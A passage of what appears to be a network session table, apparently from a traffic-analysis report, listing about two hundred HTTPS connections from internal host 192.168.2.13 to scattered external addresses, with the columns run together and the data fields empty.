                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16866192.168.2.134844824.65.107.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16867192.168.2.1348062183.186.202.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16868192.168.2.1351826209.43.220.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16869192.168.2.1344336167.2.31.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16870192.168.2.1348190191.3.196.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16871192.168.2.1333174173.205.205.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16872192.168.2.1346694112.21.186.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16873192.168.2.134594071.17.121.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16874192.168.2.134354039.246.111.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16875192.168.2.1348376176.108.146.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16876192.168.2.13400162.13.27.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16877192.168.2.133337642.167.96.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16878192.168.2.134952059.12.251.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16879192.168.2.135991489.228.36.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16880192.168.2.1359750169.226.208.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16881192.168.2.1348788101.101.50.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16882192.168.2.1354386116.253.37.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16883192.168.2.1354018110.157.197.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16884192.168.2.135535845.129.167.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16885192.168.2.1351898172.56.12.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16886192.168.2.136014286.158.155.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16887192.168.2.1332996168.16.79.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16888192.168.2.1345516115.149.212.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16889192.168.2.135494217.86.175.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16890192.168.2.1336322216.219.81.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16891192.168.2.1337116186.115.169.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16892192.168.2.1340484156.173.99.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16893192.168.2.1360048124.174.2.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16894192.168.2.1345124174.180.240.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16895192.168.2.1342630217.115.15.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16896192.168.2.1347872101.253.146.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16897192.168.2.1360328170.178.102.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16898192.168.2.1357420203.111.219.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16899192.168.2.1348748116.31.168.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16900192.168.2.134377485.163.93.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16901192.168.2.1338594100.127.170.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16902192.168.2.1346926187.164.58.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16903192.168.2.133893249.234.218.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16904192.168.2.135870414.11.206.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16905192.168.2.13529842.135.59.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16906192.168.2.1360308117.246.47.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16907192.168.2.1338316206.35.87.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16908192.168.2.1350684138.208.145.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16909192.168.2.1358202207.29.43.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16910192.168.2.134109695.31.76.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16911192.168.2.1332958166.250.128.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16912192.168.2.1349010141.236.129.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16913192.168.2.133307676.95.103.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16914192.168.2.135246275.131.162.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16915192.168.2.133987262.66.239.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16916192.168.2.135883613.226.143.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16917192.168.2.1347296114.24.176.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16918192.168.2.1333956202.162.139.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16919192.168.2.134019613.12.162.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16920192.168.2.1334412116.209.155.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16921192.168.2.133421077.152.42.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16922192.168.2.1348430130.206.38.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16923192.168.2.133891418.50.89.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16924192.168.2.133643495.188.139.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16925192.168.2.135284681.180.204.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16926192.168.2.1358604151.199.160.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16927192.168.2.1354968216.45.243.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16928192.168.2.1350292101.101.110.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16929192.168.2.1354230118.37.160.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16930192.168.2.1334906160.196.239.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16931192.168.2.1355002158.248.54.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16932192.168.2.13374841.251.128.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16933192.168.2.134059087.150.79.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16934192.168.2.1345132133.149.17.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16935192.168.2.1343894160.70.156.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16936192.168.2.13454624.11.114.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16937192.168.2.1359736183.75.90.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16938192.168.2.134519693.19.86.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16939192.168.2.1337112169.14.30.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16940192.168.2.135599693.49.19.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16941192.168.2.1352190111.194.27.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16942192.168.2.1346756102.21.133.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16943192.168.2.1349000202.205.145.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16944192.168.2.1340472152.105.71.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16945192.168.2.135999814.130.231.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16946192.168.2.1357224111.247.34.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16947192.168.2.133967425.120.107.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16948192.168.2.134268234.195.129.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16949192.168.2.134256840.82.227.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16950192.168.2.134966281.97.164.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16951192.168.2.1335132182.91.251.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16952192.168.2.1344664123.135.206.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16953192.168.2.1350396200.125.79.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16954192.168.2.1338564197.9.32.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16955192.168.2.133491049.19.132.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16956192.168.2.1342344102.242.47.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16957192.168.2.135504437.14.12.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16958192.168.2.1359516169.176.88.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16959192.168.2.1356658116.62.114.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16960192.168.2.1339984149.141.5.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16961192.168.2.1360414178.228.165.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16962192.168.2.1340860163.164.196.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16963192.168.2.1348786163.188.246.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16964192.168.2.1350678154.174.245.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16965192.168.2.1346088118.120.73.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16966192.168.2.1352048190.187.249.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16967192.168.2.133600453.30.171.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16968192.168.2.13369468.45.107.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16969192.168.2.1345712205.17.71.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16970192.168.2.1335672157.124.87.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16971192.168.2.135539859.216.36.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16972192.168.2.135103048.169.0.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16973192.168.2.133967036.163.209.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16974192.168.2.1356194118.249.136.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16975192.168.2.1346484107.134.51.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16976192.168.2.1337936139.59.75.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16977192.168.2.134908677.179.26.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16978192.168.2.1337528143.94.247.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16979192.168.2.135356064.44.73.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16980192.168.2.133987452.180.206.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16981192.168.2.1356778153.108.131.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16982192.168.2.1355350122.230.49.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16983192.168.2.135875497.98.57.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16984192.168.2.134400869.54.5.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16985192.168.2.1357444132.121.8.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16986192.168.2.133377896.29.84.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16987192.168.2.1340794193.209.102.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16988192.168.2.1339702221.145.155.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16989192.168.2.1349216206.28.100.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16990192.168.2.13511048.43.112.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16991192.168.2.134282081.61.190.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16992192.168.2.1348636162.156.109.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16993192.168.2.135487474.140.144.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16994192.168.2.1350050180.72.26.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16995192.168.2.1336762181.190.74.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16996192.168.2.1340298167.226.90.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16997192.168.2.1359522219.94.105.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16998192.168.2.1356936217.67.200.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16999192.168.2.1337438133.124.155.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17000192.168.2.135058437.200.201.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17001192.168.2.1335498172.46.120.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17002192.168.2.136074475.200.195.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17003192.168.2.1350082171.12.115.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17004192.168.2.13339522.142.88.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17005192.168.2.1350892183.137.173.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17006192.168.2.1358608132.26.218.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17007192.168.2.1343962193.157.200.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17008192.168.2.1347026197.84.35.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17009192.168.2.1352230204.92.12.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17010192.168.2.1337458189.4.123.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17011192.168.2.1344288216.235.24.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17012192.168.2.1360638160.118.20.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17013192.168.2.134373462.144.74.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17014192.168.2.1360878101.209.162.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17015192.168.2.1344864169.9.82.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17016192.168.2.135750461.78.38.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17017192.168.2.134536695.59.141.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17018192.168.2.1359784185.253.114.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17019192.168.2.1346958217.145.113.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17020192.168.2.134716899.199.74.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17021192.168.2.135205898.87.227.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17022192.168.2.134986219.185.228.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17023192.168.2.1345204159.142.227.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17024192.168.2.1345782108.80.215.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17025192.168.2.1345444220.211.135.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17026192.168.2.1336206221.200.255.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17027192.168.2.135808488.180.19.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17028192.168.2.1335364202.253.110.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17029192.168.2.1347736114.122.108.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17030192.168.2.1354228103.212.169.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17031192.168.2.1340682134.189.48.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17032192.168.2.134781617.136.37.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17033192.168.2.1347602146.80.27.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17034192.168.2.135830683.106.105.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17035192.168.2.1354276107.106.141.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17036192.168.2.1336234117.146.192.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17037192.168.2.1358718204.62.142.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17038192.168.2.1336790211.192.23.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17039192.168.2.1355566201.14.254.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17040192.168.2.1360034197.84.24.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17041192.168.2.1351086192.191.23.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17042192.168.2.134257235.47.159.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17043192.168.2.1353354116.94.13.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17044192.168.2.1343836188.64.184.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17045192.168.2.1343604221.179.103.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17046192.168.2.135096053.41.38.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17047192.168.2.135947275.248.146.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17048192.168.2.13485645.13.168.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17049192.168.2.135520636.66.15.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17050192.168.2.1357680167.100.20.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17051192.168.2.135363453.174.187.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17052192.168.2.1359226142.29.64.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17053192.168.2.1350658109.171.11.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17054192.168.2.1337010166.156.144.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17055192.168.2.1334646107.33.189.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17056192.168.2.1334018167.83.102.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17057192.168.2.1355738166.115.247.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17058192.168.2.1338526152.181.65.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17059192.168.2.135123880.122.216.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17060192.168.2.133847096.211.136.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17061192.168.2.133976827.231.116.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17062192.168.2.1333326220.196.64.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17063192.168.2.133297884.27.32.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17064192.168.2.133492497.109.199.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17065192.168.2.134600445.201.216.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17066192.168.2.1360194210.96.30.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17067192.168.2.134464447.29.251.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17068192.168.2.135640044.149.19.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17069192.168.2.135836041.16.61.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17070192.168.2.135089431.26.103.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17071192.168.2.134967296.36.146.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17072192.168.2.135187248.233.214.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17073192.168.2.133923487.237.119.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17074192.168.2.1357420218.100.99.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17075192.168.2.13495201.70.146.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17076192.168.2.134932444.81.159.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17077192.168.2.134030874.9.193.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
